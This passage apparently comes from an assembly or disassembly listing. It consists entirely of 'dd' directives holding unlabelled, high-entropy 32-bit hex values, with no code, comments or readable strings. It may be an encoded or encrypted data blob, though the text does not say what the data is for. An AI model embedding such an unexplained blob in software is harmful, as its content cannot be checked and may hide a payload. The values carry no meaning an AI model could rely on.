dd 9428BFD2h, 0C4ECD586h, 0F8AC73Eh, 305E1AEFh, 4A0C0DA2h
dd 40C85D4Ch, 91718200h, 0F214B5D4h, 0C2C2CF76h, 71B9E820h
dd 2E3030D7h, 51F55698h, 9BBD7764h, 0BC4485C4h, 0E53087CEh
dd 0BE89F05Bh, 2B485454h, 240A54FEh, 74C86D99h, 90BB6D39h
dd 0AA6EE2EFh, 0CCF8F385h, 0FAB1DD40h, 5D61083Fh, 660B2F94h
dd 68CA4167h, 9E689F08h, 84289DCFh, 0F8F9E0F6h, 2F9CE911h
dd 36410AEFh, 2DC1389Fh, 6D3A2970h, 6A4EA270h, 0E965A46Ah
dd 0C3A8DAF5h, 2DAC17A9h, 8DC35CB2h, 73C260B8h, 0E590EF6Ch
dd 0E9927F79h, 75FBC4C2h, 8306C00Eh, 9E59F56Ah, 570D9A9Dh
dd 0F1A82C02h, 0F0D04AC3h, 0C82AE0F0h, 0CDDFEAB7h, 0D1141F37h
dd 0F74BAF5h, 672108A0h, 0E929DD45h, 6A08EC5Ch, 56ABDA6Ah
dd 9DB08E14h, 0B4E44EC5h, 6CCCF11Fh, 0E2B73ECEh, 6D821840h
dd 0DF2EF246h, 0E8390849h, 0C2E4E664h, 0AD839830h, 49260EAEh
dd 0C30DCBA2h, 78E41E00h, 703C84Eh, 36730253h, 0D1126BE0h
dd 34D7B44Dh, 0FC88AF89h, 1853D5F9h, 0F1F8A1D6h, 272C8E9Eh
dd 2E90B898h, 0F4DCF8E2h, 3168064Eh, 336446CEh, 67922270h
dd 95E09266h, 0C132D4B2h, 64F4FDAFh, 65CE5EDFh, 0B0653D96h
dd 39B61A77h, 772B932Eh, 55AD7B0Bh, 546CDAD3h, 912D291Eh
dd 68046E4Eh, 0BA030F7Bh, 0DD19B924h, 74E81C7Ch, 0D31C3C01h
dd 52AB28DAh, 24765D9h, 61084AA8h, 1243C133h, 0F58280Ah
dd 6403FDA9h, 0D9761A27h, 8D1B3BEEh, 95E09013h, 0A8D3958Fh
dd 0FB2C159h, 0CB411E0Eh, 6A9DD81Eh, 0BF5CFB8Dh, 665658EAh
dd 0A1710DB1h, 0C84070A4h, 0AA874E26h, 1F15CBDh, 25FB067Eh
dd 72FB3735h, 67E96149h, 69087C62h, 5FB9D7F3h, 2EA020E1h
dd 5069878Fh, 8038F48Ch, 0FBD5EF8Ah, 102FC97Bh, 5F0C4C24h
dd 0C64C4845h, 38A009Bh, 0E9C25D5Ah, 0C7A48FA6h, 0FC98B4F2h
dd 60AF63BFh, 0AA5A689Ah, 346AD75Bh, 5B981C32h, 0E330D6A3h
dd 79E3D090h, 126BCC0Ah, 71E89F0Eh, 0CE837E53h, 258023B4h
dd 0FFF61212h, 0C3422FDFh, 0B37D2E96h, 0CF4DA01Ah, 0AEF2D007h
dd 289BA4C7h, 0B9B6E6Bh, 0FD740D4Ah, 5AB5A09Eh, 0A99883A2h
dd 0D61774D9h, 5D207092h, 0DAED17C6h, 11A83FB7h, 0D44063D5h
dd 0B9D3D8BAh, 909CBAD2h, 79E835C6h, 5BD8E78Eh, 798040D8h
dd 7CD1E4Eh, 9B8D0B72h, 3064DE80h, 0B13425F6h, 6FFC8352h
dd 0A14836F2h, 239436EAh, 0FDB2426Ch, 0A1B915D1h, 8278D4ECh
dd 8F5313D7h, 3410786Bh, 6E5E38E7h, 19C02D68h, 0A1B4064Eh
dd 0F3027565h, 221ABAF6h, 0D183E0C4h, 5A20062Ah, 0CA2748CAh
dd 0D9C06A2h, 7CF7FC62h, 0C344E98Ch, 0E96035A3h, 27F86950h
dd 5152B019h, 7DD36F8Ch, 3B6A8DD5h, 5A45F266h, 0EFB8B902h
dd 0AD9233F1h, 3A8D804Ah, 2D1B08E2h, 0B6156CB6h, 0FBE40F3Ah
dd 0BFF0DB21h, 48F9BC6h, 0D998CC72h, 3144263Eh, 32AC545h
dd 0D32D2A16h, 0F1F8065Ah, 0C360AA61h, 9A822D15h, 808F9226h
dd 49177E17h, 37B61BCEh, 7FEA01Ah, 6C4AFB13h, 0D14D503Fh
dd 16BD4DFEh, 65E088DFh, 19ED6196h, 0E90CEE1Dh, 2CB9E21h
dd 592FF07Ah, 0B76CCBD6h, 0E4829A92h, 5584384Eh, 44D457AAh
dd 9F9C32F7h, 89D2C7Ch, 830A67C8h, 0D8C78E93h, 41031164h
dd 4A577534h, 3B0E1F70h, 0EAE37E5Bh, 0FFC308C3h, 87385A2h
dd 0A34B33E1h, 0F86D903Ah, 573C741Dh, 3D1044B8h, 5BC41E1Eh
dd 0EF850739h, 825CC289h, 99A8AC0Eh, 734B0341h, 0FCA9609Ah
dd 0A68C3AE6h, 488A440Ch, 7EA1E128h, 3670C8CAh, 0B310AAD0h
dd 0F08C736Fh, 7F5456AEh, 0B15345DAh, 72E3307Ah, 0D138E41Eh
dd 8BA4B373h, 0A4EDB80Ah, 2A681711h, 1954E0BDh, 6D355A7Bh
dd 996820A5h, 463DAFD2h, 9BE8B78Ch, 1391A111h, 55CF2F4Ch
dd 3FC673D9h, 0FEC81C05h, 76EBA48Ch, 0BD70EE10h, 0C7FC6A35h
dd 7810D402h, 0F445E9Eh, 49FE4F85h, 0FFB87359h, 0E632797Dh
dd 73F1C6DEh, 44F3966Eh, 5848FFEFh, 290954A2h, 9BA42CFEh
dd 0A5A6591Bh, 0F0227769h, 3C05BCF2h, 83C48DB1h, 9E9432Ah
dd 663E1A97h, 432DDB43h, 6C04EE60h, 50AFFCAEh, 9F8C8CD0h
dd 0F4684FBAh, 532473F9h, 4743B9DBh, 0F8CD7027h, 0E56B0B41h
dd 7BE1DB41h, 4E83F27Eh, 644F52DDh, 0C4740CA1h, 3389F55Bh
dd 0F15A9B3Ah, 5C2CEA87h, 0B179CC58h, 0A03C9D1Eh, 0AE9B18A1h
dd 4B3DF445h, 0EC4A6B07h, 347728A5h, 1CBB395h, 0F75831B1h
dd 0D098FE66h, 0A4DB042Ch, 254EAE5Fh, 5531A916h, 6A08EC5Ch
dd 0C7FDA6Ah, 5AA75979h, 9FECE041h, 5277ED92h, 6DCB6D1Dh
dd 57914F7Eh, 0B651AE33h, 0CA07BEA1h, 0CFC0C061h, 96EE90Dh
dd 1B3F2DC9h, 53EA41B1h, 0AD90605Bh, 0BC439AEFh, 0EA20ACB9h
dd 0E6A4EC5Ah, 6366131Ch, 5A1231EEh, 78E45E63h, 0F3F87021h
dd 1914DE9Eh, 0D59B6B1Fh, 16A4FD44h, 2B4142EFh, 5F1521ADh
dd 23B9587Bh, 0A90C9616h, 0E11397FBh, 0EADDDE9Bh, 1C97EB3Bh
dd 0A6F379Ch, 63F81CB0h, 239A5F61h, 0AF49865Ch, 0E266BFB2h
dd 91B8A4FAh, 8685235Eh, 45404607h, 0AEBB730h, 6E80C52h
dd 0C30A981Bh, 0B26801DAh, 99A6A652h, 5F2EC1F9h, 973D4EAEh
dd 3FC50636h, 10C28330h, 446BA9BFh, 0B3AB8C53h, 7F961B3Ah
dd 0F24ACFD1h, 9C8C15Fh, 8E4B1E0Eh, 0E500C0BCh, 451A5B4Ch
dd 6256E28Eh, 0BC1687FFh, 6CA83071h, 0A473C51Dh, 5D0304Eh
dd 0D3CCAA0Bh, 0E670C8CAh, 0CB92E150h, 9608302Eh, 536ADC3Bh
dd 69603BFAh, 0F586994Bh, 0E3AD1BC1h, 5484AEE0h, 12380BFAh
dd 0B7E38D88h, 39684CC9h, 4CF7605Dh, 0A92E5315h, 384C96EAh
dd 0B1A63E67h, 8598663Eh, 55D89775h, 0D083BD20h, 19DAC0AFh
dd 6EDDC56Eh, 0AD22383Fh, 0C6FDFB06h, 20A9D403h, 0CDD1A1CFh
dd 0CD9028D4h, 0FFDC123Dh, 8B6DBFD7h, 0F75AF4FDh, 72C0EC56h
dd 7732F0F3h, 4152BCB2h, 68D32EFEh, 9B997A3Ah, 0CF7D84E2h
dd 9B1D43B2h, 0AD48610h, 4D1E4AFFh, 0BA5D45C6h, 1A1599Fh
dd 0AB81775Eh, 9450C895h, 0A1162709h, 117B8C52h, 5334668Ah
dd 340AF557h, 8A951A36h, 0F127D2CFh, 4EA626BEh, 52D657F5h
dd 7FE2EFD3h, 0CA185CA2h, 338A594Bh, 686D103Ah, 0D73CF4ABh
dd 0B0129082h, 0E3969E74h, 0E5107868h, 76C749h, 0D92D2C12h
dd 7ED67314h, 0DD5E8017h, 0A1E6E8E6h, 9FB521BFh, 0D706E6Eh
dd 6721189Ah, 3092B7E9h, 1650FC72h, 0D36BF03Bh, 0DA2576FAh
dd 77EC9A07h, 5138687Ah, 64D769DEh, 37E35369h, 9350B658h
dd 33FD33C2h, 0B4B630h, 6D008732h, 0A6F9D7A6h, 789824EAh
dd 0C512B3B3h, 0E8D8E89Ah, 47833D23h, 89C89C2Eh, 2A5A3F39h
dd 133415F4h, 17E06642h, 0CF7291ADh, 0BC1DE8Eh, 0A7A53CE5h
dd 174F9236h, 59286C87h, 2A6BF343h, 8099200Ah, 0F733E8DBh
dd 345E3CB2h, 26275101h, 75E0B75Ch, 5FB86D96h, 0A8883CE0h
dd 3D586C2h, 0DC48A47Ah, 486CCAC7h, 81865287h, 0FBC0FF5Eh
dd 155058ABh, 1FF6E67Dh, 0EF7DF310h, 5634F6B1h, 0A0F5991Ah
dd 87DF124Eh, 0CB8D8B72h, 0D0645E80h, 7A0DABE8h, 0EFFC1248h
dd 4CC5F5D7h, 0A384A89Dh, 7F756F6Ah, 0D22C7AB9h, 0B8FC4B12h
dd 80C41E1Fh, 0E59BF42Ah, 3AD3E249h, 99B8B26Dh, 32B30388h
dd 2741608Ah, 4D8D50E6h, 0F4DEB30h, 5824FE41h, 317F3732h
dd 8FBCA376h, 29DF1F1h, 295446B0h, 0E2F362EAh, 0E7D2F4D3h
dd 0DEF86192h, 0AB85FE5Bh, 96D152Ah, 0EE1C6268h, 0C354A4CAh
dd 87DCD9F1h, 0B300005Ah
dd 0F3C53C8Dh, 3467E0D6h, 7BF4B0BCh, 4BAAD507h, 2ECD42C6h
dd 0F63201CAh, 64817B91h, 0D760C0A4h, 97B8C206h, 22AA8452h
dd 744ECB61h, 611D38FAh, 6A510612h, 0D938AE6Ah, 0B9C2C99Eh
dd 99E4E491h, 65049AA7h, 0B4A55F8h, 18EE3CFCh, 0FDD44C41h
dd 0E330316h, 0A2D9B402h, 7CC4B26Ah, 0E0AD2048h, 377C758Eh
dd 11B838FAh, 0DD2ADB5Eh, 0E57EF8D2h, 0BAA692D8h, 41C6A967h
dd 734C43F6h, 678A33FFh, 27825369h, 74E7A372h, 0BB74F084h
dd 951C6C8Bh, 6F968256h, 0B61B0BF2h, 33AB3C7Bh, 6D6D9B3Ah
dd 0BD2CFA93h, 0DA6327D2h, 639593D7h, 6510786Fh, 35387790h
dd 8C577B02h, 0F3E43874h, 9D4C2419h, 0A0E4B10Dh, 0CD89432h
dd 4B3ACEC3h, 0CA231FCAh, 1F832883h, 97C87962h, 8BE15BFAh
dd 1EA0A0C5h, 67F91AE3h, 0DCB56492h, 2B947F99h, 5BAD601h
dd 204FA427h, 0A957CA57h, 934C250Eh, 0E691AF24h, 0FF9D758h
dd 919824CDh, 8E4AFC33h, 0FFD8889Ah, 0CE833D2Ch, 802B8B50h
dd 881501E3h, 16AFDB50h, 5F11A7C8h, 2F8146Dh, 20B3593Ah
dd 306FEB53h, 7FCCACCCh, 4C5FD102h, 477546DEh, 78F04830h
dd 72F3FA66h, 0C148EA18h, 0DAE3137Eh, 1F0885Ah, 20B9A587h
dd 29882CFCh, 0C5D4162Eh, 0CD61B7FFh, 0BF85CAC6h, 56475BECh
dd 7B11FEDBh, 455058AAh, 1B5E6F76h, 0B6E20142h, 0BC5B88AEh
dd 0CBEFE0B4h, 0E1A5F606h, 2E385517h, 560D3A9Eh, 7AC4086Fh
dd 83996176h, 0A83ABEC7h, 0AEB5D39Ah, 5DC0B030h, 77634AA6h
dd 5C1531A1h, 6CE46C7Bh, 80748A0Bh, 0B551F3D8h, 0FCC4C950h
dd 1698F220h, 342C13E9h, 57ED52C6h, 60F86D42h, 0BE048A10h
dd 0D615B8B2h, 0FBD2C362h, 1D7B5C4Eh, 2A3038CFh, 3D9A5794h
dd 0A0E6076Bh, 0B95B90F3h, 8BE3D0B7h, 0A5BCF44Bh, 7F651312h
dd 190C22A3h, 7BD34F60h, 8B202C2Eh, 0A16CA8C9h, 0CFFDDD80h
dd 32C4FD5Ah, 3C511FAAh, 257178A2h, 7BAD7475h, 9175D60Bh
dd 0D219F0DFh, 0F18C8673h, 1F9DED20h, 6B7B2DFAh, 40FD57A9h
dd 8B953217h, 0F95B85A2h, 0D619AFBAh, 0F989803Bh, 0B2C0941h
dd 603D20D3h, 57068F56h, 9DA50DFFh, 0ADA54FD1h, 0B92EA8CBh
dd 5B6C257Ch, 4D866469h, 2165805Ch, 0E97C8296h, 5C4AAA80h
dd 0B3F0AE61h, 5DF07EAAh, 4343D515h, 2B68EF69h, 0D22A8F41h
dd 0FA3B4FAFh, 632314CAh, 0BB64CEBEh, 95B0A80Ah, 6FFC8256h
dd 49485CA2h, 239436EEh, 0FDE0103Ah, 0D72CEA86h, 0B178C4D2h
dd 8BC49E1Eh, 6510786Ah, 3F5C52B6h, 19A82C02h, 0F3F4064Eh
dd 0CD40E09Ah, 0A78CBAE6h, 81D89432h, 0E381ED1Eh, 35705888h
dd 4D008795h, 0E608FC72h, 4E409519h, 2AAFA8A9h, 0A7EF8C0Dh
dd 751C2019h, 59887CF5h, 0D922333h, 9D97E605h, 0B52AE7D6h
dd 0D10C3387h, 0E889804Ah, 475C181Ah, 0E31B3119h, 9A3DEC16h
dd 5D30EC48h, 0BF589D53h, 89AC7422h, 437C766Eh, 0B06050BAh
dd 78FA683h, 0E9C15D52h, 0BC7D2EAh, 5A675AEEh, 6F9E06B3h
dd 80DFAF82h, 172BCBCDh, 1D23200Ah, 68F08A99h, 0C5B057B2h
dd 62D581Ch, 75E0ABC6h, 3B3C5815h, 2ABA17E7h, 4D59065Ch
dd 837BA886h, 0C36CF045h, 7A8A5B16h, 7B76815Dh, 0BAAF0F42h
dd 34521909h, 0E9AAB0CFh, 9837BE8Eh, 280F03EEh, 87DCD8BEh
dd 238CF1B5h, 3B644EAEh, 2958280Ah, 64FC0256h, 0D90A4827h
dd 553D5EEEh, 65086FC5h, 0D42C6A86h, 213AD06Fh, 3B11E1Eh
dd 0C11865E3h, 23B7D2A6h, 0DB3C21FDh, 0FC37865Eh, 5D02F81Fh
dd 0B319B3E6h, 0E9D80470h, 0DB24EE7Dh, 3EB301F9h, 8FBC2285h
dd 84E02E62h, 40ABA950h, 0DE28C6Fh, 743A0946h, 0DE38E8E8h
dd 0AB85B95Ah, 95AA1B2Ah, 0A2987D76h, 0B2684CC2h, 0FBE42A4Ch
dd 12FFFE92h, 85F05FA5h, 679BB4E2h, 0FBEC046Eh, 4C446873h
dd 5B52BB56h, 0F8235C21h, 6215BEE5h, 62BF0F5Bh, 0D3552BD9h
dd 4F8C81Eh, 836F0772h, 2A6AC169h, 0FFDCA5B9h, 0A1A98A82h
dd 0BC46F530h, 8DC00B9Fh, 5D8F2C66h, 0CA5D21B2h, 194F3EB4h
dd 4F302C1h, 314E0AC7h, 1C8B431Dh, 83C4D492h, 25E0F5D7h
dd 0B3E8453Dh, 0EEB82412h, 0FB4642EBh, 90B888AAh, 9C634D08h
dd 69AA30C7h, 0EFB1E98Eh, 2E805098h, 849F3E22h, 3A2BF6B2h
dd 586C78B1h, 0B5792818h, 4BD84305h, 6D5475A6h, 78B03AC7h
dd 7C09FB7Ah, 6CFBE57Dh, 3046B00Fh, 0E58136E5h, 0E4260CB1h
dd 9E670B4Dh, 988658FDh, 46D6D0B5h, 4C669436h, 0FF65291Dh
dd 0C6E0C1h, 3CD1385h, 0B4663C39h, 2A8364EDh, 68068883h
dd 0E66BE655h, 62A6C41Bh, 67AE12D3h, 20D13F92h, 757BC121h
dd 0ECC4DAA9h, 20E30C99h, 0BD02CF01h, 66FD4E56h, 0F8887FA5h
dd 475C7C9Fh, 39A98C94h, 1F24EC3Ch, 0B3D2EA89h, 0F77AA87Dh
dd 763DB2CAh, 6BD6F591h, 380A813Dh, 0E28DC25Eh, 0B78FBADh
dd 7B4FAD9Dh, 9C15BABAh, 0D5DC8210h, 31424B69h, 0C9F4EC96h
dd 0BDD85519h, 120D1277h, 0C0E02B4Dh, 1FA4AEFEh, 0A4FDFC98h
dd 0A4F69C76h, 918DD714h, 83D4162Eh, 1E9F12D1h, 8EFC5F4Bh
dd 4693A402h, 9CC7A4A9h, 5569DC2Fh, 1F9C32F6h, 397D034Ah
dd 253F064Fh, 0BDB9425Fh, 81B99B26h, 44917914h, 0BE925D55h
dd 15A01188h, 89FA7754h, 226DEDAFh, 0A299D0EAh, 954BF61Fh
dd 0A8D3953Ah, 0B84C0759h, 1B86B28Bh, 12D3536Ah, 0AF655633h
dd 99A8AC02h, 0B3618946h, 0A5EADC9Eh, 0D873C57Ah, 436881BBh
dd 5ED2EE6Eh, 0B560F148h, 80B8D717h, 420A9753h, 0B497FD6Eh
dd 0D99B47Fh, 0F7EC0A46h, 5B1F909Ah, 0BBBDC05Bh, 8E30592Ah
dd 1A977F10h, 0C1D8E7A4h, 6D31ACA4h, 2C001063h, 0A049C146h
dd 0A9E3D96h, 0D0824E0Dh, 31887A61h, 847C4759h, 30B699A8h
dd 0BB10F67Eh, 1678307Bh, 3296CC5h, 78F89475h, 0B7F47B75h
dd 9DF61801h, 54BA12DDh, 0DD42F569h, 477D2E96h, 894D5FE5h
dd 6FECBBB4h, 81D151D4h, 184F8598h, 9F5A98FAh, 3FD4BA83h
dd 29774311h, 93F302ABh, 0A7A0767Ah, 0B34339CEh, 0EF7B50C0h
dd 15C78A94h, 3B97AC60h, 6145C63Ch, 87E4F888h, 0AD3B1244h
dd 9D8F3410h, 0B707F1DFh, 3AA85EF5h, 4ED40A55h, 6D0068E1h
dd 983F3EBDh, 5971D827h, 23B436EEh, 8866A03Ah, 5A28EE84h
dd 14F23A9Dh, 8BD4A762h, 9990D30Ch, 8F5B27B3h, 0E6E7AC02h
dd 911CAC0Eh, 3ABF1F65h, 0B7B53E63h, 81989432h, 3D9C087Eh
dd 81723DFBh, 0BF17443Fh, 978DF67Ah, 354C697h, 750AB31Ah
dd 8813757Bh, 0D4CFEC22h, 2B94075Ah, 5D0982Ah, 59ACF003h
dd 80146948h, 38D2A61Eh, 18057CDAh, 0C74CEAA1h, 8BD8CBBDh
dd 6B5983FDh, 3D30F8B3h, 50833DDBh, 0B04C19D5h, 6314767Eh
dd 3E1440BAh, 0E0064AB6h, 0E1C180D7h, 0CB44DE9Eh, 1D97CCE2h
dd 7F301963h, 0DCDF2329h, 33647F4Ah, 0CC02019h, 0E7FC7E69h
dd 29E8D4B2h, 262D0554h, 75E0CAD6h, 0B0C2AE7Eh, 83608C1Dh
dd 0A3699F85h, 3520E038h, 4893347Bh, 0A83C21E5h, 6B077E4Eh
dd 5F2458AAh, 2618B701h, 0F9E80C52h, 0D940E78Eh, 527EEE32h
dd 795772D9h, 88A88B8Dh, 0BEEFE514h, 15A06A96h, 27D7CDDDh
dd 8BEC612Bh, 0EB1DB6FEh, 198728C6h, 64875C79h, 0C6D32212h
dd 1BFD9A9Bh, 0E510FB6Ah, 494FA6B6h, 89912E87h, 7980064Eh
dd 0B2BDCA72h, 0D9D7D219h, 6660EBCDh, 7002671Ah, 1E1608F9h
dd 0B63827E1h, 690B7C72h, 192056AEh, 2422B50Ch, 826C0A56h
dd 2CB90C98h, 996C4121h, 6D2F67D4h, 0A0E38F74h, 2D806C72h
dd 0F04BD9F5h, 12B86663h
dd 56E7BCB3h, 250D3F59h, 8CE49E07h, 56F29F58h, 5A7C42D6h
dd 0F514F436h, 0FCA40991h, 429A3E52h, 6814CCF9h, 0E053E247h
dd 0C08BD535h, 35D29C6Fh, 76143936h, 5CDF10CAh, 0B364FF4Ah
dd 8DC0A019h, 0E2FB4212h, 41486D36h, 1DA42EFEh, 7007243Eh
dd 0CF2CDB12h, 0A888BCE2h, 413C9C5Bh, 0B5DF8F87h, 0C893B78Dh
dd 283CA1E5h, 0EB04FE4Eh, 0CF24DCAAh, 60611E1Eh, 848964BDh
dd 0D6C39971h, 2D90795Eh, 7CC1A22h, 77F0E306h, 39B3143h
dd 5D4E6823h, 0AFF43AFDh, 0F1E358D6h, 447FCE9Bh, 9FF891h
dd 52DB1579h, 0B168FD56h, 8BC49E16h, 0D8900A1Fh, 3F4C6B34h
dd 0F1C15802h, 0C0BFB2Bh, 0E458C922h, 0D929B02Fh, 41D8840Bh
dd 0FE2E6D9Ah, 356071B4h, 0F2F7CABDh, 58B8039Dh, 41D15C04h
dd 37A0A0C3h, 8811B6AEh, 0D48E6B6Dh, 2B9407A0h, 1101CA7h
dd 0D7FC3336h, 120E4172h, 0C41EA7BEh, 92FDA0B2h, 63707359h
dd 0DA7A8C94h, 7F61F967h, 0C530F8B3h, 0DB7CC2D6h, 23812C25h
dd 9961CE08h, 9606B1B8h, 0E850D6EEh, 5B10B4ADh, 42EF1EADh
dd 0B5D23057h, 0FB596536h, 79287CBBh, 467446CEh, 0D328770Dh
dd 0BDF3059Ah, 99E81B39h, 1EAE64D5h, 75E0B136h, 0E5C0281Fh
dd 0D674F40Ah, 826C70D1h, 59A507BAh, 0F76CDAFFh, 0E5B8A412h
dd 43C0FE5Dh, 7C2CFDA0h, 0B4FA32E6h, 0BB64B1CBh, 249FE69Eh
dd 0BDB9445Fh, 87CC9A26h, 0D1110132h, 47E14CEEh, 0BFB03833h
dd 0D67887A1h, 0C9C8DCB2h, 0A8E1B6EEh, 0F8EA288Ah, 573C53FBh
dd 5745AF78h, 0FCDC2FA6h, 0F5297CEFh, 0BF5DD2B6h, 29AAD802h
dd 0E518C67h, 8D4070A3h, 82863902h, 1C82D4Fh, 63424518h
dd 3087384Bh, 8FAC9B92h, 69087E62h, 8BE054DBh, 24DD95F0h
dd 5C8A0A56h, 9390591Bh, 3B3CBECEh, 2ED09803h, 6698F781h
dd 39604CD2h, 62C0260Eh, 12FC20B2h, 43C92D59h, 0A198A4CBh
dd 0EE48E3Ah, 5F88D881h, 3F453C53h, 4423B622h, 0DA907399h
dd 0B560D0AAh, 86D9AA06h, 917B3C34h, 723AFB94h, 8EF638FAh
dd 1476D205h, 0F0908A97h, 0CDD1CCD6h, 4DC0B023h, 0C2067982h
dd 41486DCCh, 9E538598h, 0F5E031CEh, 0CF3CF296h, 69090484h
dd 4754955Ah, 23857A72h, 516C5AFFh, 940E2BB9h, 0EB14C7DCh
dd 3EFF3001h, 1A6B4D09h, 79F8B5C6h, 1334668Eh, 7D304EAEh
dd 3EB09F24h, 9B2F462h, 449B352Bh, 1C4EE787h, 7FBE12DBh
dd 0CDCDABA2h, 239426D7h, 8960103Ah, 7DC45A8Ah, 5C54D79h
dd 60C48E5Ch, 9EF1906Fh, 55B4AD49h, 0EE57D3F9h, 0E3CD82CBh
dd 0CC40E09Ah, 1787CFE6h, 0FD5D9E72h, 0F1247E47h, 8D164721h
dd 0AAB6E295h, 0E918C51Eh, 0C2E47DC8h, 19254750h, 77EC9A7Fh
dd 24386692h, 0AF01C9F1h, 5D00813h, 0AA1CF676h, 0B3A87CD8h
dd 838DD88Bh, 0EEA50A5Ah, 864C4A9Fh, 99FE2412h, 4B4F8F58h
dd 6538038Ah, 0D1F9C896h, 23C88C1Bh, 5A90F399h, 3D6050AAh
dd 7D92A0Eh, 197BBC34h, 0F2397B94h, 0EF6B8FAh, 77379386h
dd 0DC222432h, 33647FB3h, 0F71FC8B0h, 62FB0599h, 0C148ED36h
dd 9BB4AEFEh, 5085FDFBh, 0B7BFDAF0h, 10F599E8h, 0A8B2163Eh
dd 0F48A3049h, 0A72E5A7Bh, 153D5312h, 6B046E67h, 305078AAh
dd 0F4EB83E9h, 0F0506A59h, 0AE91EC96h, 6D80D0E3h, 22C699C2h
dd 61084D0Fh, 864DE5D8h, 15A06A9Ah, 4A76C3DCh, 0C9589E32h
dd 0FB241D88h, 449C1538h, 0BF866A96h, 0CE87BEABh, 32409BE9h
dd 0E513F87Ah, 9328D3B6h, 0A02C29F5h, 73F4865Eh, 6D35649Ah
dd 1E08BF11h, 1D81422h, 0D151ED7Eh, 4A891622h, 75F74AE9h
dd 69E0839Dh, 0ABABA954h, 0E25FCABBh, 0CE688FB1h, 0D138E482h
dd 0A3F0B6DEh, 6D7A519Ah, 0A0E3885Bh, 0ECC935h, 13B4261Eh
dd 0C774105Ah, 4266DD16h, 0A1888D8Eh, 76FE6EFFh, 55146003h
dd 1600E7D4h, 0ED081C32h, 0E7D0766Dh, 449F3811h, 0F61C55F9h
dd 880F6CF8h, 0F322A161h, 809AD815h, 0FFCC2B4Ah, 3FC047E4h
dd 448B3937h, 9DF9249Fh, 670C5A66h, 0CA1C20B2h, 9329A539h
dd 0DEF01808h, 337D6B57h, 2C82E452h, 83C4AF52h, 0A49F98D0h
dd 0B29BB539h, 11A81D96h, 0EB44FE5Eh, 7D36D4DEh, 1A9671A6h
dd 79F8B53Eh, 0EB526C65h, 888AA025h, 7DC235Ah, 77F05F14h
dd 4C9B3147h, 85892C8Fh, 6FFC8156h, 0C21728A3h, 8311BD21h
dd 0D6E00078h, 2B64634Eh, 348F0DE1h, 8BD4A79Ah, 6590786Ah
dd 0BAD15CC3h, 19B8157Eh, 73B40EC4h, 3533E363h, 0E341BE6Bh
dd 40D88416h, 0D094669Eh, 5376AB61h, 697C13AEh, 66B09AC9h
dd 0C3ECBE2Eh, 7CA2B0FAh, 0DCB42120h, 574DAD17h, 0EBB586B8h
dd 0C660B34Ch, 26371ADCh, 3C9F333Dh, 93A49F8Ah, 0ED00805Ah
dd 88C740D2h, 632CB179h, 33CF0E2Eh, 3DCCA003h, 50833BA9h
dd 61625F92h, 9CEB8F6Bh, 4F0D537h, 925B2A16h, 0F1E83DD6h
dd 0EB44DE9Eh, 8EC7BE9Fh, 6637CACEh, 72003F09h, 0B8A46D36h
dd 1D828897h, 6F99FB66h, 0C058C4F0h, 0BFE025C7h, 1D4D014Eh
dd 0C43C7286h, 39CAB05Fh, 8B513D2Eh, 2A20E038h, 0A7554E43h
dd 91B8E412h, 9C060A5Eh, 4192F372h, 9CCB64F6h, 0E9AAC8FFh
dd 573BE68Eh, 0AD80C103h, 87CC97CEh, 335D3F72h, 8280BF0h
dd 59F40638h, 7A03021Ah, 0C958E2D0h, 0E14C3367h, 0F6B3902Ah
dd 8F2F56DEh, 0BA50372Dh, 122C2A5Dh, 6EEF079Fh, 0AF1E6A23h
dd 0DBABF702h, 0AF710F42h, 4E4070D8h, 0A20532A4h, 1C856D2h
dd 240C9DF5h, 0B5704879h, 7B4E4A16h, 0D483839Dh, 43441416h
dd 0E946D8ACh, 6267F5B9h, 0D128A62Ah, 0A88CF455h, 4BFB9460h
dd 50199BF5h, 39692C4Ah, 4930290Eh, 0EE00005Bh, 0D70E6613h
dd 0D92DB7F2h, 0D7E49E7Ch, 0D03F80B6h, 2F7C4274h, 22CC5AAFh
dd 0F3568EEBh, 0ED66D3BAh, 685809EEh, 0C94507ADh, 4B444EDCh
dd 62AB339Fh, 0E45F1D3Ah, 3228EC83h, 0BE1FFC2h, 82C0B058h
dd 670D77E3h, 39DD57B2h, 7DA43EBCh, 0D00F30CBh, 0CFC06799h
dd 0E903BCE2h, 0B797BD2Ch, 0A946982Ah, 8A55B539h, 11A866AAh
dd 0EBE07B51h, 4053D8AAh, 9F8CF04Ah, 3B900941h, 53BF669Eh
dd 228C07F1h, 7CCD7A4h, 0E95FCF72h, 0BBA04DB1h, 5533A80Ah
dd 7BBB8154h, 0B30D9A1h, 73C636FEh, 0BF38A5C5h, 42D3EA96h
dd 0B168FAE0h, 84041B44h, 6510CFEFh, 3FC0BBB6h, 0E6942C02h
dd 0F3608341h, 0F3C0E09Ah, 2C09B5F3h, 0AD89432h, 180F6F38h
dd 0C09818FEh, 3643DDE5h, 0F94A44DFh, 0C023A3AEh, 8DE20C7Fh
dd 0F698946h, 0D83874D0h, 3BC6DA5Bh, 3ED0932Ah, 0CF5E2EF3h
dd 8260BEC2h, 83F6468Bh, 5069F25Ah, 374C5AA6h, 3E700380h
dd 76E40E3Eh, 14BB14C4h, 0ED7FC0FDh, 6D4DA732h, 1614662Ch
dd 2DA4D3B6h, 53231BF9h, 1A991876h, 4ECB1D85h, 0A580FA72h
dd 7691956h, 0B1287CC0h, 0CC8BB25Dh, 0DC0897Bh, 0E9797A66h
dd 0B3549399h, 93E395F7h, 8ACC0A45h, 40759D69h, 0D6768E67h
dd 27E89DD1h, 0F4A457FBh, 4893CAC6h, 0D3534BEDh, 0B2034DFh
dd 0BB058AAh, 1317F2C5h, 3D6D8B66h, 5A34F6CCh, 0BDC2005Fh
dd 0F751726h, 6218745Bh, 2B26363Bh, 0B0154E0Ah, 0EC3A2918h
dd 8B63C8E0h, 58D270E2h, 2E6157D2h, 522C6A86h, 0B87844D2h
dd 559BE258h, 70EFAFA9h, 0BF4CECC8h, 96B744C3h, 73F59CCBh
dd 2714309Ah, 0D87350CEh, 11E6CAA7h, 84E46B7Eh, 0B47540C5h
dd 354A216h, 81F78386h, 435456BFh, 5BD455A9h, 0A489662Fh
dd 0A34D87F7h, 0EAFDCAB7h, 0C965672Ah, 0A01C6234h, 29567E57h
dd 4731AF0Eh, 5001018h
dd 0C74CDABFh, 0C0CCD1A1h, 0CABEB55h, 26420DE4h, 7F0C2BBEh
dd 60BE7550h, 86739302h, 0E08887BAh, 7F5355EEh, 71F88441h
dd 2E163BCDh, 57FF4C99h, 96AE4253h, 0BC4485F4h, 0E474A3A9h
